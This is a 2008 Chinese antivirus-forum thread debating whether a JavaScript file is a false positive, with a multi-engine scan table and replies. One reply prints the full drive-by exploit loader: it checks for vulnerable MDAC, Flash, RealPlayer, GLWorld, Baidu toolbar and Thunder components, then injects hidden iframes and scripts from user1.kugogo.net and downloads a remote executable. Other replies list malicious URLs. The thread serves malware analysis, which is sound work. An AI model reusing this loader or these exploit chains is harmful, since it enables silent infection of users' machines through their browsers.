此JS是误报还是毒？

ppkppk

Antivirus	Version	Last Update	Result
AhnLab-V3	2008.5.29.0	2008.05.29	-
AntiVir	7.8.0.19	2008.05.29	JS/Dldr.Iframe.BB
Authentium	5.1.0.4	2008.05.28	HTML/Iframe.A!Camelot
Avast	4.8.1195.0	2008.05.29	-
AVG	7.5.0.516	2008.05.29	-
BitDefender	7.2	2008.05.29	-
CAT-QuickHeal	9.50	2008.05.28	-
ClamAV	0.92.1	2008.05.29	-
DrWeb	4.44.0.09170	2008.05.29	-
eSafe	7.0.15.0	2008.05.28	-
eTrust-Vet	31.4.5832	2008.05.29	-
Ewido	4.0	2008.05.29	-
F-Prot	4.4.4.56	2008.05.28	-
F-Secure	6.70.13260.0	2008.05.29	-
Fortinet	3.14.0.0	2008.05.29	-
GData	2.0.7306.1023	2008.05.29	-
Ikarus	T3.1.1.26.0	2008.05.29	-
Kaspersky	7.0.0.125	2008.05.29	-
McAfee	5305	2008.05.28	-
Microsoft	1.3520	2008.05.29	-
NOD32v2	3143	2008.05.29	-
Norman	5.80.02	2008.05.28	-
Panda	9.0.0.4	2008.05.28	-
Prevx1	V2	2008.05.29	-
Rising	20.46.32.00	2008.05.29	-
Sophos	4.29.0	2008.05.29	-
Sunbelt	3.0.1123.1	2008.05.17	-
Symantec	10	2008.05.29	-
TheHacker	6.2.92.322	2008.05.28	-
VBA32	3.12.6.6	2008.05.29	-
VirusBuster	4.3.26:9	2008.05.28	-
Webwasher-Gateway	6.6.2	2008.05.29	Script.Dldr.Iframe.BB

不是误报
http://bbs.kafan.cn/viewthread.php?tid=258035&extra=page%3D2

[ 本帖最后由 Exia 于 2008-5-29 19:18 编辑 ]

palfan

我连不到JS里的地址

http://www.star111.net/dm1.htm?27

solcroft

网马，flash漏洞，iframe，什么都有...

try{var e;
var ado=(document.createElement("object"));
if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)
ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var as=ado.createobject("Adodb.Stream","")}
catch(e){};
finally{
if(e!="[object Error]"){
document.write("<script src=http:\/\/user1.kugogo.net\/ms06014.js><\/script>")}
else{
try{var f;
var Flashver = (new ActiveXObject("ShockwaveFlash.ShockwaveFlash.9")).GetVariable("$version").split(",");}
catch(f){};
finally{if(f!="[object Error]"){
if(Flashver[2] == 47){document.write('<embed src="http://user1.kugogo.net/flash1.swf"></embed>')}
if(Flashver[2] == 115){document.write('<embed src="http://user1.kugogo.net/flash2.swf"></embed>')}}}
try{var g;
var glworld=new ActiveXObject("\x47\x4c\x49\x45\x44\x6f\x77\x6e\x2e\x49\x45\x44\x6f\x77\x6e\x2e\x31");}
catch(g){};
finally{if(g!="[object Error]"){
document.write('<iframe style=display:none src="http://user1.kugogo.net/GLWORLD.html"></iframe>')}}
try{var h;
var real=new ActiveXObject("IERPCtl.IERPCtl.1");}
catch(h){};
finally{if(h!="[object Error]"){
if(new ActiveXObject("IERPCtl.IERPCtl.1").PlayerProperty("PRODUCTVERSION")<="6.0.14.552")
{document.write('<sCrIpT LAnGuAgE="jAvAsCrIpT" src=http:\/\/user1.kugogo.net\/real.js><\/script>')}
else{document.write('<iframe style=display:none src="http://user1.kugogo.net/Real.html"></iframe>')}}}
try{var i;
var Baidu=new ActiveXObject("BaiduBar.Tool");}
catch(i){};
finally{if(i!="[object Error]"){
Baidu["\x44\x6c\x6f\x61\x64\x44\x53"]("http://user1.kugogo.net/Baidu.cab", "Baidu.exe", 0)}}
if(f=="[object Error]" && g=="[object Error]" && h=="[object Error]")
{
try{if(new ActiveXObject("DPClient.Vod"))document.write('<iframe width=100 height=0 src=http://user1.kugogo.net/Thunder.html></iframe>')}catch(e){}
}}}

[ 本帖最后由 solcroft 于 2008-5-29 20:57 编辑 ]

shery0000

flash马开始散开了

到处是
http://user1.kugogo.net/flash2.swf
http://user1.kugogo.net/flash1.swf
         ---> hxxp://user1.12-23.net/bak.css

palfan

MS开始爆发了 咱们见证了历史

solcroft

这个bak.css不知道到底有几个版本...

Palkia

rs 0

qigang

http://user1.12-23.net/bak.css

RS20.46.32未杀！

qigang

瑞星病毒查杀结果报告

清除病毒种类列表：

病毒： Trojan.DL.Win32.Mnless.agu

MAC 地址：00:11:5B:F3:6D:69

用户来源：互联网

软件版本：20.46.32